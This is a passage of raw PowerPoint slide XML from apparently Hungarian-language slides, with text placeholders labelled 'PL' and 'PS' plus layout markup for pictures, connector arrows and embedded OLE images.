                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053A3859-1B85-4547-A8C1-DC39E96F7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1363983"/>
            <a:ext cx="10566399" cy="369565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A936F6-6200-46E2-B5A7-259A341B6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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Kép 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2567780F-F84E-421D-AE27-7D167FF096CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="972180" y="1970715"/>
            <a:ext cx="10107936" cy="1320635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Kép 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9260E63-2E9A-4224-A9B9-A9E6E03EA960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="972180" y="3893877"/>
            <a:ext cx="10107936" cy="965079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C797297C-63F5-6B20-F92B-584817E26B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3581400" y="2355850"/>
            <a:ext cx="2724150" cy="2885312"/>
            <a:chOff x="3581400" y="2355850"/>
            <a:chExt cx="2724150" cy="2885312"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Egyenes összekötő nyíllal 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91750033-15ED-4E39-BD3D-A68E52841E20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5518150" y="2355850"/>
              <a:ext cx="7874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Egyenes összekötő nyíllal 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF15578-7762-4630-8D6E-1CF2CF156F54}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4730750" y="4194175"/>
              <a:ext cx="7874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Egyenes összekötő nyíllal 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8479E0A-F660-404B-9590-91AF71785B15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3581400" y="4634737"/>
              <a:ext cx="0" cy="60642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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Object 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2690FA61-D0BA-B57F-8E5B-258B236AA4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1035428400"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1525137" y="1363983"/>
          <a:ext cx="9141725" cy="4888841"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId4" imgW="11387797" imgH="6088940" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId4" imgW="11387797" imgH="6088940" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="1525137" y="1363983"/>
                        <a:ext cx="9141725" cy="4888841"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2281B9A2-5915-CC5A-910D-2E19A222A9C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1982337" y="1933900"/>
            <a:ext cx="7764909" cy="4111625"/>
            <a:chOff x="1982337" y="1933900"/>
            <a:chExt cx="7764909" cy="4111625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="5" name="Straight Arrow Connector 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A46FEE-124F-7548-EBC9-C9845D7933FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8553450" y="1933900"/>
              <a:ext cx="0" cy="42195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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6550DA65-E751-2684-386B-1ABAE84451C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5616573" y="2968950"/>
              <a:ext cx="5334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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{007A4E48-9671-4D01-C009-54B80DE0B0B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1982337" y="4281166"/>
              <a:ext cx="34493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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B8DF8C5-83B6-16AD-E294-83CFEF6EA15C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9747246" y="4224016"/>
              <a:ext cx="0" cy="40449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0" name="Straight Arrow Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90ADA74F-2AF3-ADAF-3662-EDB9677619D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8445498" y="6045525"/>
              <a:ext cx="5334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238030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7FFAEF8-1B56-BA0C-E8B4-1B77E182184E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A575563A-1A56-D6DA-AC59-9487DDF9D8AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5999ECF6-8B3D-00CA-6A6D-645F7335D8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1363983"/>
            <a:ext cx="10566399" cy="369565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8E616A-9987-C523-D657-2574B1031D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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Object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698BCCC1-EFA6-7B5C-F270-9D5FB0C476A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1333413144"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2035492" y="1365888"/>
          <a:ext cx="3933825" cy="5418137"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId2" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId2" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId3"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="2035492" y="1365888"/>
                        <a:ext cx="3933825" cy="5418137"/>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4BA8FD0A-7D02-263A-23CD-383930A4152A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1074966238"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6222496" y="1362456"/>
          <a:ext cx="3933825" cy="5418137"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId4" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId4" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="6222496" y="1362456"/>
                        <a:ext cx="3933825" cy="5418137"/>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08BB6A32-BA83-0B70-E39F-C381A5BBFC75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2658248890"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2039301" y="1362456"/>
          <a:ext cx="3933825" cy="5418137"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId6" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId6" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId7"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="2039301" y="1362456"/>
                        <a:ext cx="3933825" cy="5418137"/>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E018DE59-3BEB-CC9F-B6D4-C8030BD402CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4246554701"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6227064" y="1362456"/>
          <a:ext cx="3933825" cy="5418137"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId8" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId8" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId9"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="6227064" y="1362456"/>
                        <a:ext cx="3933825" cy="5418137"/>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7C30D720-2CBF-AD20-ACA8-377CB4ED24D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2455873322"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2039112" y="1362456"/>
          <a:ext cx="3933825" cy="5418137"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId10" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId10" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId11"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="2039112" y="1362456"/>
                        <a:ext cx="3933825" cy="5418137"/>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5A5DF885-3B45-493D-8768-F0CD900E84EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2920629872"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6227064" y="1362456"/>
          <a:ext cx="3933825" cy="5418137"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId12" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId12" imgW="8274265" imgH="11395746" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId13"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="6227064" y="1362456"/>
                        <a:ext cx="3933825" cy="5418137"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D6B5EB1-65AF-0C72-D44A-93A03B9CD393}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394141" y="1733548"/>
            <a:ext cx="5096887" cy="1906585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="28" name="Object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B39EAB-60CC-00E2-80DE-C636347A81FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2276686733"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7391152" y="2011438"/>
          <a:ext cx="3221272" cy="1305143"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId15" imgW="4664143" imgH="1666815" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId15" imgW="4664143" imgH="1666815" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId16"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="7391152" y="2011438"/>
                        <a:ext cx="3221272" cy="1305143"/>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9A5A1B5C-89F2-BEB4-629E-D4593BFF1318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3882283397"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7391152" y="3923313"/>
          <a:ext cx="3221272" cy="2286650"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj r:id="rId17" imgW="3944581" imgH="2800636" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId17" imgW="3944581" imgH="2800636" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
